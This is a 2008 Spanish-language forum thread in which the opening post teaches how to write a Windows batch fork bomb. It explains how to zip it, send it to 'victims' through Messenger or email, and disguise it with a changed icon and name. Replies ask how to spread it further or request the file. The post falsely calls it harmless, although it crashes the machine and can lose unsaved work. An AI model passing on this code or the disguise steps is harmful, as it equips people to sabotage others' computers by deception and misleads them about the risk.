Buscar : en
Por :

VIRUS PARA TRAVAR UNA PC POR MESSENGER

MAXWEL, el 26 jul 2008, 17:06:02
 Señalar este mensaje a los moderadores

Hola,
AMIGOS LE ENSEÑARE A HACER UN VIRUS QUE SOLO ASUSTARA Y TRABARA LA PC DE SUS VICTIMAS ES MUY SENCILLO
LO UNICO QUE TIENEN QUE HACER ES IR AL BLOCK DE NOTAS E INTRODUCES LOS SIGUIENTES DATOS
@echo off
:uji
start
goto uji
exit

luego le dan cerrar y el te pide si guerdar y le das si
lo guardas como quieras la importante es que al final del nombre diga .bat y le das guardar
despues le das clik derecho le das enviar, le das comprimir en zip luego lo puedes enviar
si estas en otro compu le puedes crear un acceso directo y cambiarle el icono y el nombre

eso es todo para que le den un pequeño susto a un amigo
este truco no dañara la pc por ser simplemente un comando
el pc se reiniciara y luego abrira como si no alla pasado nada
espero que les guste gracias
si queren me puedes escribir a mi correo
toteo_20@hotmail.com

Configuración: Windows XP
Firefox 3.0.1

Mejores respuestas para « VIRUS PARA TRAVAR UNA PC POR MESSENGER » en :
[Virus] ¿Que hacer si el PC tiene virus? VerSi sabes o crees que tu PC tiene virus: 1. Detéctalos Escanea el PC con un antivirus "en línea" (se necesita Internet Explorer con ActiveX autorizado), por ejemplo puedes hacer un scan con: http://housecall.trendmicro.com/es/...
[Virus] Método de desinfección VerIntroducción 1. Eliminación de archivos potencialmente peligrosos 2. Hacer un scan con un Anti-Spyware 3. Hacer un scan con un Antivirus en línea 4. Ejecución de Hijackthis 5. Opinión de un experto Artículos a...
Descargar MSN Virus Cleaner VerMSN Virus Cleaner es una aplicación que permite eliminar los virus y gusanos de tu MSN Messenger de una manera rápida y sencilla. Nota: Necesitas Microsoft.NET Framework 2 en tu sistema.
Virus - Introducción a los virus VerVirus Un virus es un pequeño programa informático que se encuentra dentro de otro programa que, una vez ejecutado, se carga solo en la memoria y cumple instrucciones programadas por su creador. La definición de un virus podría ser la siguiente:...

1

Nnet, el 28 jul 2008, 14:13:35
  • +18

Hola

esta muy interesante la informacion..Mi pregunta es la siguiente tiene igual de efecto si uno lo manda por mail?

2

suares, el 29 jul 2008, 22:47:57
  • +32

AMIGOS TIENE EXACTAMENTE EL MISMO RESULTADO EL COMPUTADOR SE TRABARA PERO NO SE LE DAÑARA NINGUN ARCHIVO
ES SOLAMENTE PARA ASUSTAR A TU VICTIMA ATT:MAXWEL
SI QUERES PROBALO Y VERAS
O PROVALO EN UN SIBER
GRACIAS.

3

Nnet, el 30 jul 2008, 14:37:10
  • +8

Que bueno!!!!! Gracias por la informacion

4

gggg, el 22 ago 2008, 07:29:24
  • +5

Oie io no pude....no se xq pero no pude hacerlo...

5

thugs, el 5 sep 2008, 01:48:49
  • +1

Eeii ta chid man ajahaajaa bientraumado ne ta chido carnal mis respetos alos hacker soi la mamada yo quisiera ser uno de eelllo pero se necesita estar todo el dia en la compu ajaj bueno sobres man

6

hola, el 20 sep 2008, 04:32:54
  • +9

Oe causa puedes enviar a este correo astrocito01@hotmail.com